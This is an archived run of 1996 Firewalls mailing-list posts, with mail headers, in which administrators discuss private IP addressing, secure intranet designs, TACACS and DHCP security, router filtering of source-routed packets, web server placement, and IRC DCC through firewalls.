> implemented solely an HTTP proxy server and sophisticated IP filtering
> on a Cisco router, what are the potential problems that could arise? Are
> there any circumstances where the internal IP address would "leak" out
> onto the Internet and cause problems?
>
> tia,

You can find RFC 1918 at http://andrew2.andrew.cmu.edu/rfc/rfc1918.html, which obsoletes RFC 1627, 1597 on address allocation for private internets.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Boni D. Bruno, Director of Internet Services - x225
818-883-9800 (FAX)883-4604
Data Systems West
21101 Oxnard Street
bbruno@dswnet.com
Woodland Hills, CA 91367
http://www.dswnet.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From firewalls-owner Fri Jul 5 12:34:11 1996
From: Bill Stout
To: Firewalls@GreatCircle.COM
Subject: Secure Virtual Intranets
Date: Fri, 5 Jul 1996 12:23:44 -0700

What
are the most widely used methods to create Secure HTTP/FTP Intranets over the Internet? I can think of just a few off the top of my head: 1. Encryted PC-Firewall links. a. Webserver must be inside firewall, guests must also pass through firewall. b. You must pay for/install/support encryption software. c. Complete (IP) protocol stack encryption/access. 2. Certificates on browser and server. a. Webserver can be outside firewall. b. No (additional) cost/support for client software c. Security is based on physical browser, not user. b. Certificates must be requested from Verisign/RSA, or private certificates created via Xcert software (http://www.xcert.com/). 3. HTTPS. a. Webserver can be outside firewall. b. No (additional) cost/support for client software b. Intranet Username/Password authentication managed separately from network authentication. c. Multiple Intranet servers also managed separately. Bill Stout <=======10========20========30========40========50========60========70========80 William B. Stout | Major revelations: Senior Systems Admin | "All objects are part of a larger object." Hitachi Data Systems | "3 aware beings comprise a person; mind, body, spirit." NT/UNIX/I-net/Routers | "The secret of life: To be involved with 'creation'." 408-970-4822 | Infowar, Cyber-war, yes, 'they' are out to get you... 
-------------------------------------------------------------------------------- From firewalls-owner Fri Jul 5 13:04:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA02289 for firewalls-outgoing; Fri, 5 Jul 1996 12:51:30 -0700 (PDT) Received: from dartvax.dartmouth.edu (dartvax.dartmouth.edu [129.170.16.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA02276 for ; Fri, 5 Jul 1996 12:51:21 -0700 (PDT) Received: from hanover.VALLEY.NET (hanover.valley.net [198.115.160.10]) by dartvax.dartmouth.edu (8.7.5.1+DND/8.7.3) with SMTP id PAA09900 for ; Fri, 5 Jul 1996 15:48:40 -0400 (EDT) Received: by hanover.VALLEY.NET (blitz.valley.net) via SMTP from v2-p-110.valley.net id <1276703> 05 Jul 96 15:48:37 EDT Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 5 Jul 1996 15:54:47 -0500 To: Firewalls@GreatCircle.COM From: randy.witlicki@valley.net (Randy Witlicki) Subject: RE: OS/2 firewalls? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Check out Netguard at: > > http://www.netguard.com > > FW for both NT and OS/2 platforms. Yikes ! I just looked at their web page and the slogan there is: "The Foolproof Internet Firewall System" Take a deep breath and chant after me: Computer Security is not Software. Computer Security is not Hardware. Computer Security is Wetware. ObStory: I just finished up a System Admin contract and the management there asked "Before you leave, could you do a write-up of all the things you do, in case something goes wrong." 
- Randy
randy.witlicki@valley.net

From firewalls-owner Fri Jul 5 13:34:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA04630 for firewalls-outgoing; Fri, 5 Jul 1996 13:20:56 -0700 (PDT) Received: from tigre.dc.ufscar.br ([200.9.84.141]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA04539 for ; Fri, 5 Jul 1996 13:19:52 -0700 (PDT) Received: (from reis@localhost) by tigre.dc.ufscar.br (8.6.12/8.6.12) id RAA18067; Fri, 5 Jul 1996 17:17:52 -0300 Date: Fri, 5 Jul 1996 17:17:50 -0300 (EST) From: Christian Robottom Reis To: firewalls@greatcircle.com Subject: Novell 4.1 Router Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hey,

Does anyone know of a way to filter out local IP numbers coming from the external network through a Novell 4.1 gateway using the plain IP routing software included with NetWare 4.1? You can set up packet filtering with FILTCFG.NLM, but it doesn't differentiate between incoming and outgoing packets, and just bases itself on pure IP addresses (i.e. block packets from IP address X to IP address Y on port Z).

Thanx,
C.
___________________________________________________________________________
So what?
reis@dc.ufscar.br

From firewalls-owner Fri Jul 5 14:34:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA10969 for firewalls-outgoing; Fri, 5 Jul 1996 14:30:24 -0700 (PDT) Received: from ram-exch-nm1.ramstein.af.mil (ws130032.ramstein.af.mil [132.25.130.32]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA10953 for ; Fri, 5 Jul 1996 14:30:17 -0700 (PDT) Received: by ram-exch-nm1.ramstein.af.mil with Microsoft Exchange (IMC 4.0.837.3) Message-ID: From: Crocker Sean SSgt 786CS/SCBM To: "'Firewalls@GreatCircle.COM'" Subject: Possible TACACS vulnerabilities?
Date: Fri, 5 Jul 1996 23:31:20 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hello,

Does anyone know of any particular vulnerabilities with any of the TACACS flavors, besides the overt differences of cleartext versus encrypted authentication? In particular, how about port 65 for TACACS database service?

TIA
----------------------------------------------
SSgt Sean S. Crocker
Network Manager
Ramstein AB GE
sean.crocker@ramstein.af.mil
TEL: (49) 6371-47-6723 DSN: 480-6723

From firewalls-owner Fri Jul 5 17:34:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA18438 for firewalls-outgoing; Fri, 5 Jul 1996 17:20:34 -0700 (PDT) Received: from norway.it.earthlink.net (norway-f.it.earthlink.net [206.85.92.49]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA18424 for ; Fri, 5 Jul 1996 17:20:28 -0700 (PDT) Received: from 153.37.101.40 (pool040.Max4.San-Francisco.CA.DYNIP.ALTER.NET [153.37.101.40]) by norway.it.earthlink.net (8.7.5/8.7.3) with SMTP id UAA06952; Fri, 5 Jul 1996 20:14:17 -0400 (EDT) Message-ID: <31DDB05D.686F@earthlink.net> Date: Fri, 05 Jul 1996 17:16:28 -0700 From: "Todd Glassey, Consultant" Reply-To: tglassey@earthlink.net X-Mailer: Mozilla 3.0b5Gold (Macintosh; I; 68K) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM CC: Bill Stout Subject: Re: Secure Virtual Intranets References: <199607051923.MAA08347@osc.osc.hidata.com> Content-Type: text/plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

IMHO Bill is generally right. I have some specific commentary, but I like the idea of keeping the "authenticated" services inside the local FW so that traffic to and from them can be simply encrypted as part of a VPN architecture... As to the CA issues, hell, X.509 and its competitors are simple enough; roll your own for internal uses!
Bill Stout wrote:
>
> What are the most widely used methods to create Secure HTTP/FTP
> Intranets over the Internet?
>
> I can think of just a few off the top of my head:
>
> 1. Encrypted PC-Firewall links.
>    a. Webserver must be inside firewall, guests must also
>       pass through firewall.
>    b. You must pay for/install/support encryption software.
>    c. Complete (IP) protocol stack encryption/access.

Use any of the commercial VPN-based firewalls (SunScreen, Checkpoint, Raptor, Netcheck, etc.).

>
> 2. Certificates on browser and server.
>    a. Webserver can be outside firewall.

I disagree. If the traffic from the Web server is destined for sites "a la Intranet", it is much better to have this facility inside the firewall. Otherwise the Web server must have some sense of encryption or security services additional to its own functionality.

>    b. No (additional) cost/support for client software

Possibly true, unless SKIP or some other layered security approach is used, since this would mean an extra plug-in or layer particular to the specific implementation.

>    c. Security is based on physical browser, not user.

Yes, sort of.

>    d. Certificates must be requested from Verisign/RSA, or
>       private certificates created via Xcert software
>       (http://www.xcert.com/).

Not true of "Intranet" sites. Since the certificates are only to be used inside the Known Computing Base (or "internal" topology), this is one of the many instances where it makes sense to run a mini C.A. for one's own purposes.

>
> 3. HTTPS.
>    a. Webserver can be outside firewall.
>    b. No (additional) cost/support for client software
>    c. Intranet Username/Password authentication managed
>       separately from network authentication.
>    d. Multiple Intranet servers also managed separately.
>

Not clean enough, IMHO. The overall "Security Paradigm" used should be a part of a networking operations plan. Thus keeping the external point of contact as homogeneous as possible is more cost effective from an ops standpoint.
> Bill Stout > <=======10========20========30========40========50========60======== ---- SNIP ---- -- This email is from:: ------------------ Todd S. Glassey, Consultant (415) 324-4318 Email: tglassey@earthlink.com From firewalls-owner Fri Jul 5 21:05:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA27235 for firewalls-outgoing; Fri, 5 Jul 1996 21:02:29 -0700 (PDT) Received: from dollar.firstpac.com.au (firstpac.com.au [203.61.7.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id VAA27194 for ; Fri, 5 Jul 1996 21:02:15 -0700 (PDT) Received: from shekel.firstpac.com.au (shekel [203.61.14.12]) by dollar.firstpac.com.au (8.7.5/firstpac/0.99) with ESMTP id NAA21670; Sat, 6 Jul 1996 13:57:14 +1000 (EST) Received: (from matt@localhost) by shekel.firstpac.com.au (8.7.2/8.7.2/firstpac) id NAA00873; Sat, 6 Jul 1996 13:59:49 +1000 (EST) Message-Id: <199607060359.NAA00873@shekel.firstpac.com.au> Subject: Re: P50 summary To: gfm@readybox.com (Frank McCormick) Date: Sat, 6 Jul 1996 13:59:48 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199607050452.VAA26650@angel.readybox.com> from "Frank McCormick" at Jul 4, 96 09:52:45 pm X-Ph: ph: +61 2 394 4320 fax: +61 2 394 4398 home: +61 2 9929 0717 X-Pgp: pub 2047/DFA91FA1 1996/05/01 Matthew Keenan X-Pgp: Key fingerprint = 36 09 88 84 FA 11 82 82 D7 E7 B8 23 6E B0 22 BB From: Matthew Keenan X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank McCormick wrote this... [snip] > Source-routed packets and the Ascend P50 > ---------------------------------------- [snip] > To be fair, Ascend's design choice -- kill before filtering -- is a > reasonable one. By definition, Ascend's static filtering rules are > ill equipped to deal sensibly with variable-length option data. 
> Source-routing options can, in practice, show up at differing
> offsets in the packets, whereas an Ascend-style "generic" filter can
> look only at fixed locations.

Ahh, so then you could turn on something like IP record route and your filter wouldn't work anymore? (because the offsets are all "wrong")

Does someone have the tools/time to test this?

Matt
--
Matthew Keenan
Network Administrator
First Pacific Stockbrokers
Sydney, Australia

From firewalls-owner Sat Jul 6 00:49:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA07454 for firewalls-outgoing; Sat, 6 Jul 1996 00:27:44 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id AAA07446 for firewalls@greatcircle.com; Sat, 6 Jul 1996 00:27:41 -0700 (PDT) Received: from dagon.megatoon.com (dagon.megatoon.com [205.205.31.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA17291 for ; Wed, 3 Jul 1996 11:13:12 -0700 (PDT) Received: from line108.megatoon.com (line108.megatoon.com [205.205.31.108]) by dagon.megatoon.com (8.6.12/8.6.12) with SMTP id OAA14207 for ; Wed, 3 Jul 1996 14:10:28 -0400 Message-ID: <31DAE11F.54B3@mat.ulaval.ca> Date: Wed, 03 Jul 1996 14:07:43 -0700 From: Martin Blouin X-Mailer: Mozilla 3.0b5Gold (Win16; I) MIME-Version: 1.0 To: Firewalls@greatcircle.com Subject: Help me (DHCP) Dynamic host configuration protocol Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Please help me with the following questions:

- Is DHCP safe to use with the Internet and my network?
- If so, what is the security level?
- If I use DHCP, do I need a firewall to secure my network?

note: I am thinking of using Netware/IP

Thanks

Martin Blouin

From firewalls-owner Sat Jul 6 02:49:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA16467 for firewalls-outgoing; Sat, 6 Jul 1996 02:36:58 -0700 (PDT) Received: from gemsgw.med.ge.com (gemsgw.med.ge.com [192.88.230.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA16419 for ; Sat, 6 Jul 1996 02:36:37 -0700 (PDT) From: sameer@wiproge.med.ge.com Received: from gemed.med.ge.com (gemed.med.ge.com [3.7.12.4]) by gemsgw.med.ge.com (8.6.12/8.6.12) with ESMTP id EAA21941; Sat, 6 Jul 1996 04:32:07 -0500 Received: from wiproge.med.ge.com (jogin [3.70.200.53]) by gemed.med.ge.com (8.6.12/8.6.12) with SMTP id EAA18948; Sat, 6 Jul 1996 04:34:14 -0500 Received: from everest.wiproge.med.ge.com (nilgiri) by wiproge.med.ge.com (4.1/SMI-4.1) Received: by wiproge.med.ge.com (5.0/SMI-SVR4) Date: Sat, 6 Jul 1996 15:08:28 +0500 Message-Id: <9607062008.AA24102@wiproge.med.ge.com> To: Firewalls@greatcircle.com, mblouin@mat.ulaval.ca Subject: Re: Help me (DHCP) Dynamic host configuration protocol X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi Martin,

Correct me if I am wrong but.... DHCP is a host naming protocol basically used so that you can dynamically change IP addresses for your internal network and not need to update the hosts database. It has no security mechanism inbuilt for the web and so I think you will need a firewall to secure your network...

...sam

*SAM*From firewalls-owner@GreatCircle.COM Sat Jul 6 13:56:30 1996
*SAM*Date: Wed, 03 Jul 1996 14:07:43 -0700
*SAM*From: Martin Blouin
*SAM*Mime-Version: 1.0
*SAM*To: Firewalls@greatcircle.com
*SAM*Subject: Help me (DHCP) Dynamic host configuration protocol
*SAM*Content-Transfer-Encoding: 7bit
*SAM*
*SAM*Please help me with the following questions:
*SAM*
*SAM* - Is DHCP safe to use with the Internet and my network?
*SAM* - If so, what is the security level?
*SAM* - If I use DHCP, do I need a firewall to secure my network?
*SAM*
*SAM*note: I am thinking of using Netware/IP
*SAM*
*SAM*Thanks
*SAM*
*SAM* Martin Blouin
*SAM*

From firewalls-owner Sat Jul 6 09:34:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA29250 for firewalls-outgoing; Sat, 6 Jul 1996 09:29:26 -0700 (PDT) Received: from interlock.mgh.com (interlock.mgh.com [152.159.1.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA29243 for ; Sat, 6 Jul 1996 09:29:20 -0700 (PDT) From: dnewman@mcgraw-hill.com Received: by interlock.mgh.com id AA07751 Message-Id: <199607061626.AA07751@interlock.mgh.com> Received: by interlock.mgh.com (Protected-side Proxy Mail Agent-1); Date: Sat, 06 Jul 96 12:19:36 edt To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Actually, I'm not even sure their firewall really runs on OS/2. The Web page talks about OS/2 agents, which makes me wonder if it's really an NT firewall with a Socks-like client for OS/2. Has anyone actually touched Netguard's OS/2 code?

dn

>Date: Fri, 5 Jul 1996 15:54:47 -0500
>From: randy.witlicki@valley.net (Randy Witlicki)
>Subject: RE: OS/2 firewalls?
>> Check out Netguard at:
>>
>> http://www.netguard.com
>>
>> FW for both NT and OS/2 platforms.
> Yikes ! I just looked at their web page and the
>slogan there is:
> "The Foolproof Internet Firewall System"
> Take a deep breath and chant after me:
> Computer Security is not Software.
> Computer Security is not Hardware.
> Computer Security is Wetware.
>ObStory: I just finished up a System Admin contract and the
>management there asked "Before you leave, could you do a
>write-up of all the things you do, in case something goes wrong."
> - Randy
> randy.witlicki@valley.net

From firewalls-owner Sat Jul 6 09:49:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA29225 for firewalls-outgoing; Sat, 6 Jul 1996 09:27:34 -0700 (PDT) Received: from Grosses-Raetsel-Tor.GeNUA.DE (Grosses-Raetsel-Tor.GeNUA.DE [193.141.169.26]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA29218 for ; Sat, 6 Jul 1996 09:27:27 -0700 (PDT) Received: (from smap@localhost) by Grosses-Raetsel-Tor.GeNUA.DE (8.6.12/8.6.12) id SAA21959; Sat, 6 Jul 1996 18:24:51 +0200 Received: from auryn.genua.de(192.109.217.42) by Grosses-Raetsel-Tor.GeNUA.DE via smap (V1.3) Received: from auryn.genua.de (localhost [127.0.0.1]) by auryn.genua.de (8.7.4/8.7.3) with ESMTP id SAA06359; Sat, 6 Jul 1996 18:24:42 +0200 (MET DST) Message-Id: <199607061624.SAA06359@auryn.genua.de> To: Bill Stout cc: firewalls@greatcircle.com Subject: Re: Secure Virtual Intranets MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <6356.836670279.1@auryn.genua.de> Date: Sat, 06 Jul 1996 18:24:39 +0200 From: Bernhard Schneck Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> [...]
> 2. Certificates on browser and server.
>    a. Webserver can be outside firewall.
> [...]
> 3. HTTPS.
>    a. Webserver can be outside firewall.

With these approaches, you make it hard for bad b0yzZ to get at your stuff through the web ... but why bother with http if they can possibly hack your server through other ways?

Best thing would be to put the server behind a firewall, but not on your internal secure net. Depending on your needs, this thing may be a simple filtering router (allow from any to server port 80, deny everything else), an additional interface on your normal firewall or a completely separate box.

Also, typical encryption through any exportable software will be weak (this will probably be true for both http and ip encryption).
Even though SSL uses 128 bit keys, accessing your data from outside the US will transmit 88 bits of the secret(?!) key in clear.

If your stuff should *really* stay secret, put it in an envelope and snailmail it (and hope that no one in the post office is curious :-)

YMMV
\Bernhard.

From firewalls-owner Sat Jul 6 09:55:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA29122 for firewalls-outgoing; Sat, 6 Jul 1996 09:21:37 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA29107 for ; Sat, 6 Jul 1996 09:21:29 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB6B34.ACF79A00@rwcooper.rc.toronto.on.ca> From: Russ To: "Firewalls@greatcircle.com" Subject: RE: Help me (DHCP) Dynamic host configuration protocol Date: Sat, 6 Jul 1996 12:14:25 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Uh, well, sorry to correct you Sameer, but...

DHCP is an extension of BOOTP, and it is designed to dynamically assign IP configuration information to a device. A device using DHCP sends out a broadcast looking for a DHCP server; the DHCP server responds with an IP address, subnet mask, domain name, etc. See RFC 1533, 1534, 1541, and 1542.

DHCP is initiated using a UDP broadcast, so it's not possible to force a particular DHCP server to respond. If the DHCP server is on the same segment as the client that does the broadcast, it is eligible to respond. Cisco and other router vendors have ways to get DHCP broadcast requests across segments to a specific subnet or even a specific DHCP server, but because DHCP is broadcast based, this function is normally turned off on router segments exposed to the Internet.

There is normally no mechanism in clients for DHCP servers to force an update to the information the clients have previously received, and once the request broadcast has been responded to, the client has no listening port running for DHCP, so it's as secure as a static configuration (assuming the client hasn't had the DHCP request code modified). A "lease" parameter tells the client how long it may have the IP configuration for. At the first boot after the lease has expired, the client will automatically do a DHCP request again, possibly getting a different address than before.

Although I'm not sure what you mean by security level, DHCP is normally contained to your own segment, so unless your Internet router is forwarding DHCP broadcasts (or all broadcasts) to the Internet, the security risks are within your site.

The question about whether or not you need a Firewall is a basic security question: do you have anything that needs to be protected? If you were setting up a lab of machines to surf the net, and they were separated from your in-house LANs, you might not need a Firewall at all if you consider them sacrificial. If, on the other hand, your question is about IP address translation, then yes, you would still need something to hide the IP addresses of your machines. DHCP itself does not provide a way to hide IP addresses, so you will have to give them Internet routable IP addresses (RFC 1918) if you want them to get to the Internet.

Hope that makes things a little clearer for you.
Cheers,
Russ

From firewalls-owner Sat Jul 6 10:49:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA05845 for firewalls-outgoing; Sat, 6 Jul 1996 10:35:04 -0700 (PDT) Received: from mark.allyn.com (mark.allyn.com [206.114.135.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA05838 for ; Sat, 6 Jul 1996 10:34:58 -0700 (PDT) Received: (from allyn@localhost) by mark.allyn.com (8.7.5/8.7) id KAA14790; Sat, 6 Jul 1996 10:37:11 -0700 (PDT) From: Mark Allyn 206-860-9454 Message-Id: <199607061737.KAA14790@mark.allyn.com> Subject: Re: Secure Virtual Intranets To: Bernhard_Schneck@GeNUA.DE (Bernhard Schneck) Date: Sat, 6 Jul 1996 10:37:10 -0700 (PDT) Cc: bill.stout@hidata.com, firewalls@GreatCircle.COM In-Reply-To: <199607061624.SAA06359@auryn.genua.de> from "Bernhard Schneck" at Jul 6, 96 06:24:39 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

-> If your stuff should *really* stay secret, put it in an envelope and
-> snailmail it (and hope that no one in the post office is curious :-)

No. The best security is to use a bicycle messenger whom you can trust. It stays in one person's possession for the entire trip, and who is going to bother one of these folks anyways?
Mark

From firewalls-owner Sat Jul 6 11:49:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA09638 for firewalls-outgoing; Sat, 6 Jul 1996 11:39:50 -0700 (PDT) Received: from vpm.com (vpm.com [207.49.29.143]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA09631 for ; Sat, 6 Jul 1996 11:39:44 -0700 (PDT) Received: (from mcs@localhost) by vpm.com (8.6.12/8.6.12) id LAA26046 for firewalls@GreatCircle.COM; Sat, 6 Jul 1996 11:39:17 -0700 From: Mark Stout Message-Id: <199607061839.LAA26046@vpm.com> Subject: Installing a NT Web server on a firewall To: firewalls@GreatCircle.COM Date: Sat, 6 Jul 1996 11:39:16 -0700 (PDT) X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi All:

I'm new to this list, so if this has been discussed ad nauseam, please forgive.

I need to install an NT v3.51 server as a client's primary web server and incorporate it into their existing Internet access structure, that being a firewall to protect the corporate intranet and a proxy server for allowing internal access to the Internet. I'm wondering if there's any documentation that I can get that explains, in detail, how to set up a server to provide external access to the web server from the outside and access to the SMTP server while allowing internal access to the server for maintenance.

I believe the web server should reside on the outside of the firewall. Internal access to the Internet in general is provided by a proxy server. My thinking is that, externally speaking, I should be able to access the web server, fill out a form and send it to the SMTP gateway just like any other external mail coming in would be routed. BTW, the internal mail system is Lotus's cc:Mail.
What would be the best solution to allow external access to the server AND allow internal access to the server for maintenance, while allowing access to the SMTP server for sending processed forms, such as feedback forms?

Thanks,
Mark
--
==========================================================================
Mark Stout     | The Village Potpourri Mall: http://www.vpm.com/
---------------+----------------------------------------------------------
VPM Enterprises; P.O.Box 6427; Folsom, CA 95763-6427
Secured Web Hosting and Secured Discussion Groups
Secured Internet Sales, Marketing and Advertising Specialist
==========================================================================

From firewalls-owner Sat Jul 6 13:34:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA13783 for firewalls-outgoing; Sat, 6 Jul 1996 13:26:11 -0700 (PDT) Received: from morebbs.com ([206.165.150.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA13776 for ; Sat, 6 Jul 1996 13:26:05 -0700 (PDT) From: meowmyx@morebbs.com Received: by morebbs.com Message-ID: <9607060928.0DATT00@morebbs.com> Organization: MORE BBS X-Mailer: TBBS/TIGER v1.0/PRIMP 1.56p Date: Sat, 06 Jul 96 09:28:04 Subject: Real world security To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Far away from the rarefied world of theoretical security considerations on the firewalls list there exists a real world. It is called corporate America.

A friend of mine works for a multinational corporation. They get a news feed by FM radio to a NewsEdge server. The connection remains secure because it is one way and nothing can get back over the radio. People in the network log into the NewsEdge machine to browse the news feed.

Now a press company, let's call it Affilliated Squeeze, has come along with a grand idea. They want to replace the FM radio link with a direct line from an OS2 server in their own network and to replace the NewsEdge server inside the multinational corporation with an OS2 server.

The Chief of Information Security in the multinational asked Affilliated Squeeze about the security features in their system. Squeeze assured him their network and OS2 machines are secure and nobody can break in. The Chief of IS asked them, "What specific security features does your network and the OS2 server have?" Squeeze said, "We will have to check and get back to you on that."

Now I don't want my buddy to be open to attack by the kinds of tools that are widely available, because then he might change his passwords. Can somebody give me an idea of what kind of security, if any, Affilliated Squeeze might have in place?

MeOwMyX
theDawgEatingCat

From firewalls-owner Sat Jul 6 18:19:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA23837 for firewalls-outgoing; Sat, 6 Jul 1996 18:07:47 -0700 (PDT) Received: from okjunc.junction.net (okjunc.junction.net [199.166.227.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA23830 for ; Sat, 6 Jul 1996 18:07:42 -0700 (PDT) Received: from sidhe.memra.com (sidhe.memra.com [199.166.227.105]) by okjunc.junction.net (8.6.11/8.6.11) with SMTP id SAA05891 for ; Sat, 6 Jul 1996 18:07:24 -0700 Date: Sat, 6 Jul 1996 18:01:30 -0700 (PDT) From: Michael Dillon To: firewalls@GreatCircle.COM Subject: Re: Secure Virtual Intranets In-Reply-To: <199607061624.SAA06359@auryn.genua.de> Message-ID: Organization: Memra Software Inc. - Internet consulting MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Sat, 6 Jul 1996, Bernhard Schneck wrote:
> If your stuff should *really* stay secret, put it in an envelope and
> snailmail it (and hope that no one in the post office is curious :-)

Actually, you should get it copied to microfilm, cut out the small piece of film with the message and carefully stick it under the stamp on an envelope with a trivial letter inside.
Your correspondent can pry out the microfilm and read it at most public libraries. As they say, security is all about wetware and watching old spy movies :-)

Michael Dillon
ISP & Internet Consulting
Memra Software Inc.
Fax: +1-604-546-3049
http://www.memra.com
E-mail: michael@memra.com

From firewalls-owner Sun Jul 7 09:04:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA23322 for firewalls-outgoing; Sun, 7 Jul 1996 09:01:41 -0700 (PDT) Received: from relay.infogroup.iunet.it (relay.infogroup.iunet.it [192.106.17.222]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA23315 for ; Sun, 7 Jul 1996 09:01:33 -0700 (PDT) Received: from infogroup.infogroup.it (relay) by relay.infogroup.iunet.it (5.x/SMI-SVR4) Message-Id: <1.5.4.32.19960707160658.00665988@infogroup.it> X-Sender: ic-00006@infogroup.it X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 07 Jul 1996 18:06:58 +0200 To: firewalls@greatcircle.com From: Iacopo Mazzoni Subject: IRC and Firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi all. I need your help.

I use for IRC the program mIRC 4.0 32-bit for Windows 95. My provider has installed a firewall on the server. In the beginning my mIRC was not OK with the firewall, so my provider has enabled port 6667 in the firewall and now my mIRC is OK, but my DCC commands (send and chat) are not OK because the firewall cuts these commands.

What must my provider enable in the firewall for the DCC commands to work?

Thank you very much.
__________________________________________________________________
Iacopo Mazzoni, e-mail mazzoni@infogroup.it
c.o. Infogroup S.p.A.
- Informatica e Servizi Telematici -
Via Santelli 35, 50141 Firenze (Italia)
Phone +39-55-4365505 Fax +39-55-4360784
http://www.infogroup.it
__________________________________________________________________

